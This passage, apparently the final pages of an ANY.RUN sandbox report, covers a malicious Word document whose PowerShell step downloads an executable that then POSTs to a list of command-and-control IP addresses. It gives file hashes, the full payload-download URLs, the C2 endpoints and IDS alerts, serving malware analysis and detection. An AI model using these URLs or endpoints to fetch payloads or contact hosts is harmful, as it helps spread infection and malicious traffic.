2728 WINWORD.EXE C:\Users\admin\AppData\Local\Temp\CVR442C.tmp.cvr —
MD5: — SHA256: —
3828 POwersheLL.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms binary
MD5: FF2E5687F6AE82AD7D5766EF1959944F SHA256: B4985E762E7471F122F8D6A9B7FF91E810B644CB827469EA77736E5A6107ED01
3828 POwersheLL.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FIT0N66RBH0VW9F6ARSX.temp binary
MD5: FF2E5687F6AE82AD7D5766EF1959944F SHA256: B4985E762E7471F122F8D6A9B7FF91E810B644CB827469EA77736E5A6107ED01
2728 WINWORD.EXE C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm pgc
MD5: 475553794AFCEFEC9B9C775CB4B7A133 SHA256: EDA472127C813AD9BAE1D0D5575D8FAA2B95568639563D81408EDB4C71962BA5
3828 POwersheLL.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations- binary
ms~RF2b495c.TMP
MD5: FF2E5687F6AE82AD7D5766EF1959944F SHA256: B4985E762E7471F122F8D6A9B7FF91E810B644CB827469EA77736E5A6107ED01
2728 WINWORD.EXE C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd tlb
MD5: CC11BFD14D6ECC83477B69FF06C6C587 SHA256: A4E8F5821887AC26449C33D9B027CE31BE0E7203DD035C5DC7D34A9AEF01A6DA
2728 WINWORD.EXE C:\Users\admin\AppData\Local\Temp\~$O-100120 CDW-102220.doc pgc
MD5: 2E7A3442236F2D50C669BC79188BBD69 SHA256: BF007001BACF8F6ABF371B0B2797B7D13B741879E1E5B76FB616A934318418A9
3828 POwersheLL.exe C:\Users\admin\Jehhzda\Ben14fr\G_jugk.exe executable
MD5: 92F58C4E2F524EC53EBE10D914D96CCB SHA256: 4A9E32BC5348265C43945ADAAF140B98B64329BD05878BC13671FA916F423710
1640 G_jugk.exe C:\Users\admin\AppData\Local\photowiz\regidle.exe executable
MD5: 92F58C4E2F524EC53EBE10D914D96CCB SHA256: 4A9E32BC5348265C43945ADAAF140B98B64329BD05878BC13671FA916F423710
Network activity
HTTP(S) requests TCP/UDP connections DNS requests Threats
18 25 4 27
HTTP requests
PID Process Method HTTP Code IP URL CN Type Size Reputation
3164 regidle.exe POST — 200.116.145.225:443 http://200.116.145.225:443/x4VtVzvRhVPEyfB/Xq02AK6oEV CO — — malicious
t/
3164 regidle.exe POST — 96.126.101.6:8080 http://96.126.101.6:8080/VDpVH/OUmWd7VBXpU7L/VxWud US — — malicious
uF/zT560LD/f6oH6uVWDWqAsckvA/U3LgE/
3828 POwersheLL.exe GET 404 69.65.3.162:80 http://eubanks7.com/administrator/ubdDbB/ US html 315 b suspicious
3828 POwersheLL.exe GET 200 35.214.215.33:80 http://lidoraggiodisole.it/cgi-bin/zLG879/ US executable 368 Kb malicious
3164 regidle.exe POST 404 5.196.108.185:8080 http://5.196.108.185:8080/VznUAWLqI/pARcFNvv/EWIHClK FR html 564 b malicious
Kbva6/zQVAdPyKoQYwu/G2AcsRRGqJEa3/QNV1u3DgLR5d
ntG/
3164 regidle.exe POST — 167.114.153.111:8080 http://167.114.153.111:8080/OxYV/8zgZIoGYStRl/Jk8OOBe/ CA — — malicious
HRAZSzsYY/9IpMzzRmtoHM/
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 50/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
3164 regidle.exe POST — 194.187.133.160:443 http://194.187.133.160:443/Nqdlz/w2BG/ BG — — malicious
3164 regidle.exe POST — 103.86.49.11:8080 http://103.86.49.11:8080/VCvOqXMjgEehauu/AyEp/O9Qn2/ TH — — malicious
R6Rj7Gw9eOv6yJ/fC5a36YfopGe/Q2AwYvSohZiyaEtbbo/
3164 regidle.exe POST — 98.174.164.72:80 http://98.174.164.72/ghMuzyNCNWN/kMmYdVIthxeVy/o2fe US — — malicious
o8eu7Jyv/O2M8WIf9SpyCp/yLVEV96eosyd5URJ477/8wdGX
dz9k9hhJjWp/
3164 regidle.exe POST — 78.24.219.147:8080 http://78.24.219.147:8080/jCOc/oQQPMafJlpMi6n3/Pbao/K RU — — malicious
7oB22aAUKQ6lA6r/GoOMY/
Connections
PID Process IP Domain ASN CN Reputation
3164 regidle.exe 167.114.153.111:8080 — OVH SAS CA malicious
3164 regidle.exe 194.187.133.160:443 — Blizoo Media and Broadband BG malicious
3164 regidle.exe 103.86.49.11:8080 — Bangmod Enterprise Co., Ltd. TH malicious
3164 regidle.exe 5.196.108.185:8080 — OVH SAS FR malicious
3164 regidle.exe 98.174.164.72:80 — Cox Communications Inc. US malicious
3828 POwersheLL.exe 69.65.3.162:80 eubanks7.com GigeNET US suspicious
3164 regidle.exe 200.116.145.225:443 — EPM Telecomunicaciones S.A. E.S.P. CO malicious
3828 POwersheLL.exe 35.214.215.33:80 lidoraggiodisole.it — US suspicious
3164 regidle.exe 78.24.219.147:8080 — JSC ISPsystem RU malicious
3164 regidle.exe 50.245.107.73:443 — Comcast Cable Communications, LLC US malicious
DNS requests
Domain IP Reputation
eubanks7.com 69.65.3.162 suspicious
erkala.com — whitelisted
lidoraggiodisole.it 35.214.215.33 malicious
dns.msftncsi.com 131.107.255.255 shared
Threats
PID Process Class Message
3828 POwersheLL.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3828 POwersheLL.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3828 POwersheLL.exe Misc activity ET INFO EXE - Served Attached HTTP
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
Debug output strings
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2023 ANY.RUN LLC. ALL RIGHTS RESERVED
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 51/51